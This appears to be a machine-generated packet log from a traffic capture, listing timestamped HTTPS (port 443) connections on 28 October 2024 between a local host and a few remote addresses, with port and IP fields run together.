                                                                                                                                                                            Oct 28, 2024 19:12:50.110752106 CET4435919513.107.246.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.111308098 CET59195443192.168.2.413.107.246.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.111341953 CET4435919513.107.246.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.166027069 CET59195443192.168.2.413.107.246.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.189102888 CET4435919613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.189760923 CET59196443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.189793110 CET4435919613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.190593958 CET59196443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.190606117 CET4435919613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.326333046 CET4435919613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.326457977 CET4435919613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.327125072 CET59196443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.332077980 CET59196443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.332120895 CET4435919613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.332159042 CET59196443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.332175016 CET4435919613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.338234901 CET59202443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.338273048 CET4435920213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.338372946 CET59202443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.341466904 CET59202443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.341489077 CET4435920213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.688710928 CET4435919513.107.246.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.688782930 CET4435919513.107.246.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.688817978 CET4435919513.107.246.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.688864946 CET4435919513.107.246.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.688901901 CET4435919513.107.246.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.688919067 CET59195443192.168.2.413.107.246.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.688922882 CET4435919513.107.246.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.688919067 CET59195443192.168.2.413.107.246.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.688987017 CET4435919513.107.246.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.689038038 CET59195443192.168.2.413.107.246.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.689038992 CET59195443192.168.2.413.107.246.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.689105034 CET4435919513.107.246.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.689337015 CET59195443192.168.2.413.107.246.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.689646006 CET59195443192.168.2.413.107.246.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.689673901 CET4435919513.107.246.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.835000992 CET4435919813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.835331917 CET4435919713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.835660934 CET59198443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.835676908 CET4435919813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.836371899 CET59198443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.836373091 CET59197443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.836379051 CET4435919813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.836390018 CET4435919713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.836996078 CET59197443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.837006092 CET4435919713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.838629961 CET4435920013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.839119911 CET4435919913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.841089010 CET59200443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.841105938 CET4435920013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.841411114 CET59200443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.841419935 CET4435920013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.841939926 CET59199443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.841939926 CET59199443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.841953039 CET4435919913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.841959953 CET4435919913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.971735954 CET4435919813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.971889973 CET4435919813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.972100973 CET59198443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.972100973 CET59198443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.972227097 CET59198443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.972255945 CET4435919813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.972528934 CET4435919713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.972596884 CET4435919713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.972697973 CET4435919713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.972826958 CET59197443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.972851038 CET59197443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.972851038 CET59197443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.972866058 CET4435919713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.972875118 CET4435919713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.975303888 CET59204443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.975308895 CET59203443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.975338936 CET4435920413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.975369930 CET4435920313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.975460052 CET59204443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.975462914 CET59203443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.975601912 CET59204443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.975609064 CET59203443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.975620985 CET4435920413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.975640059 CET4435920313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.979383945 CET4435920013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.980086088 CET4435920013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.980176926 CET59200443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.980176926 CET59200443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.980350018 CET59200443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.980360031 CET4435920013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.982134104 CET59205443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.982166052 CET4435920513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.982289076 CET59205443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.982353926 CET59205443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.982364893 CET4435920513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.982444048 CET4435919913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.982530117 CET4435919913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.982626915 CET59199443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.982636929 CET4435919913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.982752085 CET59199443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.982752085 CET59199443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.982882023 CET59199443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.982889891 CET4435919913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.984529972 CET59206443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.984539986 CET4435920613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.984688997 CET59206443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.984729052 CET59206443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.984734058 CET4435920613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.106452942 CET4435920213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.107264042 CET59202443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.107264996 CET59202443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.107289076 CET4435920213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.107300043 CET4435920213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.249658108 CET4435920213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.249730110 CET4435920213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.249842882 CET4435920213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.250005007 CET59202443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.250035048 CET59202443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.250035048 CET59202443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.250051022 CET4435920213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.250058889 CET4435920213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.252748966 CET59207443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.252768993 CET4435920713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.252933979 CET59207443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.253047943 CET59207443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.253060102 CET4435920713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.775495052 CET4435920413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.777677059 CET4435920313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.779980898 CET4435920613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.780951977 CET4435920513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.792494059 CET59208443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:51.792582989 CET44359208162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.793047905 CET59208443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:51.796277046 CET59209443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:51.796304941 CET44359209162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.796356916 CET59209443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:51.804182053 CET59208443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:51.804222107 CET44359208162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.808011055 CET59209443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:51.808027029 CET44359209162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.812251091 CET59210443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:51.812263012 CET44359210162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.812314034 CET59210443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:51.817337990 CET59210443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:51.817348003 CET44359210162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.822504997 CET59204443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.953356028 CET59205443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.953371048 CET4435920513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.953687906 CET59203443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.953722000 CET4435920313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.954088926 CET59203443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.954102993 CET4435920313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.954231024 CET59205443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.954236984 CET4435920513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.954433918 CET59206443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.954459906 CET4435920613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.954488039 CET59204443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.954495907 CET4435920413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.954936981 CET59204443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.954943895 CET4435920413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.955071926 CET59206443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.955079079 CET4435920613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.033513069 CET4435920713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.033889055 CET59207443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.033900023 CET4435920713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.034323931 CET59207443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.034327984 CET4435920713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.089972019 CET4435920613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.090106010 CET4435920313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.090192080 CET4435920613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.090274096 CET59206443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.090321064 CET59206443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.090321064 CET59206443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.090346098 CET4435920613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.090358973 CET4435920613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.090419054 CET4435920313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.090487003 CET59203443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.090537071 CET59203443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.090537071 CET59203443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.090569019 CET4435920313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.090588093 CET4435920313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.090996981 CET4435920513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.091190100 CET4435920513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.091290951 CET59205443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.091842890 CET59205443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.091865063 CET4435920513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.091896057 CET59205443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.091902971 CET4435920513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.093245029 CET4435920413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.093374968 CET4435920413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.093429089 CET59204443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.094243050 CET59211443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.094268084 CET4435921113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.094333887 CET59211443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.094768047 CET59212443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.094794989 CET4435921213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.094865084 CET59212443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.095082045 CET59204443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.095092058 CET4435920413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.095102072 CET59204443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.095107079 CET4435920413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.095434904 CET59213443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.095473051 CET4435921313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.095557928 CET59213443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.095568895 CET59212443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.095585108 CET4435921213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.095701933 CET59213443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.095715046 CET4435921313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.096021891 CET59211443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.096034050 CET4435921113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.097239971 CET59214443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.097248077 CET4435921413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.097460032 CET59214443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.097553968 CET59214443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.097565889 CET4435921413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.171864986 CET4435920713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.171963930 CET4435920713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.172019958 CET59207443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.172125101 CET59207443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.172143936 CET4435920713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.172159910 CET59207443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.172167063 CET4435920713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.174305916 CET59215443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.174361944 CET4435921513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.174441099 CET59215443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.174551964 CET59215443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.174583912 CET4435921513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.417664051 CET44359209162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.418042898 CET59209443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.418059111 CET44359209162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.419476986 CET44359209162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.419538021 CET59209443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.420486927 CET59209443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.420696974 CET44359209162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.420938015 CET44359208162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.421092987 CET59209443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.421099901 CET44359209162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.421226978 CET59208443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.421255112 CET44359208162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.421406031 CET44359210162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.421582937 CET59210443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.421591997 CET44359210162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.423036098 CET44359210162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.423093081 CET59210443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.423938990 CET59210443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.424017906 CET44359210162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.424052954 CET59210443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.425951004 CET44359208162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.426022053 CET59208443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.426748991 CET59208443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.426925898 CET59208443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.426954985 CET44359208162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.463542938 CET59216443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.463562965 CET44359216162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.463661909 CET59216443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.463968039 CET59217443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.463995934 CET44359217162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.464068890 CET59217443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.464158058 CET59216443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.464168072 CET44359216162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.464240074 CET59217443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.464253902 CET44359217162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.467334032 CET44359210162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.478744984 CET59208443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.478754044 CET44359208162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.494708061 CET59218443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.494720936 CET44359218162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.494844913 CET59218443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.495021105 CET59218443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.495033026 CET44359218162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.513286114 CET59209443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.513468027 CET59210443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.513477087 CET44359210162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.525631905 CET59208443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.551721096 CET44359209162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.551884890 CET44359209162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.551939011 CET59209443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.552131891 CET59209443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.552140951 CET44359209162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.553936958 CET44359210162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.553985119 CET59210443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.554109097 CET59210443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.554120064 CET44359210162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.562442064 CET44359208162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.562534094 CET44359208162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.562587023 CET59208443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.562695980 CET59208443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:52.562702894 CET44359208162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.853663921 CET4435921313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.854263067 CET59213443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.854316950 CET4435921313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.854720116 CET59213443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.854737043 CET4435921313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.911209106 CET4435921113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.911885023 CET59211443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.911897898 CET4435921113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.912383080 CET59211443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.912393093 CET4435921113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.916440964 CET4435921413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.916824102 CET59214443192.168.2.413.107.253.45
